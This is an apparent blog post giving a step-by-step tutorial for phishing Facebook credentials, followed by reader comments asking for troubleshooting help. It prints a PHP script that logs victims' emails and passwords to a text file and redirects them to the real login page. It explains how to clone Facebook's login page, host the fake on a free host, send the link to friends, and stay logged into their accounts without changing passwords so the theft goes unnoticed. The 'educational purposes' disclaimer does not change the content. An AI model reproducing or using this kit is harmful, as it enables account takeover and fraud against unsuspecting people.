How to Hack Facebook


Hi friends today i will explain how to hack the facebook using phishing.I have come up a little but late , but i came here to give a very detailed and good description of the process.Although there are many ways to Hack Facebook.Phishing is the Basic and very Easy and surely Hackable way to Hack Facebook or any other accounts.Phishing is nothing but sending a fake page to the victim and making him to trust you and make him to log-in from that page if they trust you and log-in in that fake page,They are gone there account is hacked and you will get their email id and password.

So i wont be late now.

Lets start the tutorial and follow the steps very carefully:

Step 1)Firstly make a phishing script if you have enough knowledge you can write it on your know otherwise just copy the below script and paste it in the notepad.

<html> 
<body> 
<?php $handle = fopen(“password.txt”, “a”); 
fwrite($handle,$_POST["email"]);
 fwrite($handle,”\n”);
 fwrite($handle,$_POST["pass"]);
 fwrite($handle,”\n”);
 fwrite($handle,”\n”);
 fclose($handle);
 header(“Location: https://www.facebook.com/login.php?login_attempt=1&#8243;); 
exit; ?> 
</body>
</html>


now save the file using file name phishing.php and change the save as file type  to All files

This makes the file to create a php file

Step 2)That's the first step and the important step of creating a phishing script file, which the base of this hacking.

Step 3)Now make a empty text file and name it as password.

Step 4)This is the file which records the email id and password of the victim if he log-in through the fake page

Step 5)Now, the rest remained is making a Fake log-in page of Facebook.Here follow these steps carefully

Step 6)Type www.facebook.com on your system this opens the login page of the page.Now right click on it and select View Page source.

Step 7)This opens a new tab with the HTML code of the Facebook log-in page..

Step 8)Now Press Ctrl+A and Select the complete HTML code on that page.

Step 9)Now open a new notepad file and Paste it there

Now press Ctrl+F  and a Find Box opens,Search for action="   in that Source code

You will find it like this as shown in the pic below




Replace the link after the action keyword i.e, which is selected in the above pic and replace it with phishing.php

Step 10)Then it becomes action="phishing.php".

Step 11)Now save that notepad with Filename as Index.html and change the Save as file type to All Files.

Step 12)You are done with making your Fake Facebook log-in page

Step 13)Now at last we have 3 Files with us they are

Phishing.php
password.txt
index.html

Step 14)These three files are very important in our phishing attack.

Step 15)Now all you have to do is Host these three files in any one of the Hosting Site.

You may use www.byethost.com which gives free hosting

Step 16)open this site and Signup for free using your Email Address.

Step 17)Verify your account using the Email you use.

Step 18)You will get the details of your Sign in information in your Email.

Step 19)Sign in using the Cpanel username and password they give you in your mail in the Cpanel website they give you in your Inbox.

Step 20)Then After signing in--->>Goto File Manager and upload these three files (Delete if already a index.html is found)

Step 21)Then get the web Address of the index.html file you uploaded.

Step 22)That's it Now you send this Address to your Friends and Ask them to sign in from this page.

Step 23)They will sign in with their username and password then they will be redirected to a original facebook log-in error page.

Step 24)But you will get the log-in information of that person in the blank password.txt file we uploaded.

Step 25)Get the link of the password.txt file we uploaded and open it and see.

Step 26)You have that Victims Email and password there.

Step 27)Now you log-in with his information and change his password.

Step 28) That's it we have done it  finally

Step 29)The only thing with the phishing process is when you change the password he gets and email of password changed from facebook.

Step 30)So, dont change the password do what ever you wanted untill he changes his password.

Only use this for Educational Purposes.

Note:
 Also learn from this that don't open any other sites or give your log-in information of  facebook on any other sites,Dont click on any other sites which ask your log-in information.Use best internet Security and any Spammers , which recognizes the Spam links you get and reports it.

Hope you all Enjoyed ,There are many more coming.

4 comments:

  1. it does not show any thing like 'in that source code' I AM STUCK AT STEP 9 PLEASE HELP !

    ReplyDelete
  2. Not working
    Completed whole process but it is not working !!

    ReplyDelete
  3. Step 21)Then get the web Address of the index.html file you uploaded .......

    how to do that ?

    ReplyDelete
  4. Hello friends if the process doesn.t work use kali linux

    ReplyDelete

Powered by Blogger.